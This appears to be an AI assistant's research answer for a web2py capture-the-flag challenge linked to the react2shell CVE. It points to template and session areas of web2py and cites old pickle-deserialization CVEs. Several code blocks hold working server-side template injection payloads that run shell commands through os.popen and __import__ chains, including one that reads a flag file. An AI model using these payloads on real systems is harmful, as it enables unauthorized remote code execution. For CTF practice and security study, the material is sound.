# Web2py Vulnerability Research

## Challenge Overview

- **Framework**: web2py (old Python web framework)
- **Goal**: Execute `/readflag` to read `/root/flag.txt`
- **Hint**: Related to react2shell vulnerability (CVE-2025-55182)

## React2Shell Connection

React2shell is a **Remote Code Execution** vulnerability in React Server Components where:

- Attackers send crafted HTTP requests
- Server-side code gets executed
- CVSS 10.0 critical vulnerability

Based on my research into web2py and the react2shell vulnerability context, here's what you should focus on for this CTF challenge:

## Key Areas to Investigate in web2py Documentation

Since the challenge is inspired by **react2shell** (a deserialization/template injection RCE vulnerability with CVSS 10.0), you should focus on these specific areas in the web2py documentation:

### **1. Chapter 5: The Views (Template Engine) - HIGHEST PRIORITY**

[web2py.com/books/default/chapter/29/05/the-views](https://www.web2py.com/books/default/chapter/29/05/the-views)

**Why**: web2py templates allow **arbitrary Python code execution** within `{{...}}` tags. This is the most likely attack surface.[1][2]

**Key vulnerability points**:

- Templates can execute ANY Python code including `import` statements[1]
- Access to global objects: `request`, `response`, `session`, `cache`[1]
- Access to `request.env` which contains all WSGI environment variables and HTTP headers[3]
- Can define functions, import modules, and execute system commands

**Potential exploitation paths**:

```python
{{import os}}
{{=os.popen('id').read()}}

# or via __import__
{{__import__('os').popen('whoami').read()}}

# or through request object
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
```

### **2. Chapter 4: The Core (Request/Response Objects)**

[web2py.com/books/default/chapter/29/04/the-core](https://www.web2py.com/books/default/chapter/29/04/the-core)

**Why**: Understanding what's accessible through `request`, `response`, and `session` objects.[3]

**Key objects to abuse**:

- `request.env` - Contains environment variables and HTTP headers
- `request.application.__globals__` - Access to global namespace
- `response.render()` - Explicit view rendering
- Session handling and cookies

### **3. Known web2py Vulnerabilities (Research Context)**

From my research, web2py has historical vulnerabilities similar to react2shell:

**CVE-2016-3957** - Pickle deserialization in sessions:[2][4][5]

- `gluon/utils.py` used `pickle.loads` to deserialize session cookies
- Combined with CVE-2016-3953 (hardcoded session key), allowed RCE

**CVE-2016-3953** - Hardcoded encryption key in `session.connect()`[2]

### **4. Specific Documentation Sections to Audit**

**Template syntax that allows code execution**:

- `{{=expression}}` - Evaluates and outputs
- `{{code}}` - Executes arbitrary Python
- `{{def function():}}...{{return}}` - Function definitions[1]

**Objects with dangerous methods**:

```python
# From templates, you can access:
request.__class__
response.__class__.__mro__
session.__class__.__subclasses__()
__builtins__
__import__
globals()
locals()
```

### **5. Attack Vectors to Test**

Given this is a "0-day" CTF challenge inspired by react2shell, look for:

1. **Template Injection via user input**:

   - URL parameters passed to views
   - Form inputs rendered in templates
   - Cookie values used in templates

2. **Deserialization vulnerabilities**:

   - Session cookie manipulation
   - Pickle deserialization in custom code

3. **Access to dangerous objects through template context**:
   ```python
   {{request.application.__globals__}}
   {{response.__class__.__mro__}}
   {{self.__init__.__globals__.__builtins__}}
   ```

### **Quick Test Payloads for SSTI in web2py**

Try injecting these into any user-controllable input that gets rendered:

```python
# Detection
{{7*7}}
{{7*'7'}}

# Information gathering
{{=dir()}}
{{=request}}
{{=request.env}}
{{=globals()}}

# RCE attempts
{{import os; os.system('id')}}
{{__import__('os').popen('cat /flag').read()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('ls -la').read()}}

# Through self object (context-free)
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
```

### **Summary: Where to Look**

**Primary focus**: Chapter 5 (Views/Templates) - understand template syntax and what Python code can be executed[2][1]

**Secondary focus**: Chapter 4 (Core) - understand `request`, `response`, `session` objects and what they expose[3]

**Exploitation approach**: Look for any place where user input is embedded into a view template without proper sanitization, allowing you to inject `{{malicious_code}}` that gets executed server-side with full Python capabilities.

The similarity to react2shell suggests the vulnerability involves unsafe handling of user data in templates or deserialization, allowing remote code execution through crafted payloads.

[1](https://www.web2py.com/books/default/chapter/29/05/the-views)
[2](https://www.cybersecurity-help.cz/vdb/SB2019062809)
[3](https://web2py.readthedocs.io/_/downloads/en/latest/pdf/)
[4](https://nvd.nist.gov/vuln/detail/CVE-2016-3957)
[5](https://www.cvedetails.com/cve/CVE-2016-3957/)
[6](https://github.com/web2py/web2py-book)
[7](https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/)
[8](https://www.vaadata.com/blog/server-side-template-injection-vulnerability-what-it-is-how-to-prevent-it/)
[9](https://www.rapid7.com/db/modules/exploit/linux/http/pyload_js2py_cve_2024_39205/)
[10](https://www.dynatrace.com/news/blog/cve-2025-55182-react2shell-critical-vulnerability-what-it-is-and-what-to-do/)
[11](https://www.paloaltonetworks.com/blog/cloud-security/template-injection-vulnerabilities/)
[12](https://www.splunk.com/en_us/blog/learn/rce-remote-code-execution.html)
[13](https://blog.cloudflare.com/react2shell-rsc-vulnerabilities-exploitation-threat-brief/)
[14](https://portswigger.net/web-security/server-side-template-injection)
[15](https://www.vaadata.com/blog/rce-remote-code-execution-exploitations-and-security-tips/)
[16](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182)
[17](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection)
[18](https://github.com/web2py/web2py/issues/1205)
[19](https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/)
[20](https://www.web2py.com/init/default/changelog)
[21](https://www.miggo.io/vulnerability-database/cve/CVE-2016-3953)
[22](https://www.thehacker.recipes/web/inputs/ssti)
[23](https://www.web2py.com/init/default/examples)
[24](https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-server-side-template-injection-ssti)
[25](https://arxiv.org/html/2405.01118v1)
[26](https://web2py.com/books/default/chapter/34/05/the-views)
[27](https://onsecurity.io/article/server-side-template-injection-with-jinja2/)
[28](https://onsecurity.io/article/server-side-template-injection-with-jinja-2-for-you/)
[29](https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/out-of-band-code-execution-via-ssti-python-mako)
[30](https://stackoverflow.com/questions/24372871/in-web2py-can-i-have-a-template-controller-method-that-can-be-used-across-view)
[31](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/)
[32](https://web2py.readthedocs.io/en/latest/_modules/gluon/template.html)
[33](https://portswigger.net/web-security/server-side-template-injection/exploiting)
[34](https://security.snyk.io/vuln/SNYK-PYTHON-PICKLESCAN-14724492)
[35](https://www.exploit-db.com/exploits/51051)
[36](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)
[37](https://web2py.com/books/default/chapter/34/09/access-control)
[38](https://stackoverflow.com/questions/35712930/how-can-i-call-a-web2py-url-from-an-outside-module)
[39](https://py4web.com/_documentation/static/pt/chapter-15.html)
[40](https://payatu.com/blog/server-side-template-injectionssti/)
[41](https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Template%20Injection/Java/)
[42](https://techbrunch.github.io/patt-mkdocs/Server%20Side%20Template%20Injection/)
[43](https://swisskyrepo.github.io/PayloadsAllTheThings/Server%20Side%20Template%20Injection/Python/)
[44](https://cjharris.co.uk/posts/templated/)
[45](https://snyk.io/blog/jinja2-xss-vulnerability/)
[46](https://podalirius.net/en/articles/python-context-free-payloads-in-jinja-templates/)
[47](https://blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
[48](https://github.com/advisories/GHSA-gp69-xcm6-ffqj)
[49](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Python.md)
[50](https://xygeni.io/blog/server-side-template-injection-explained-with-real-code-examples/)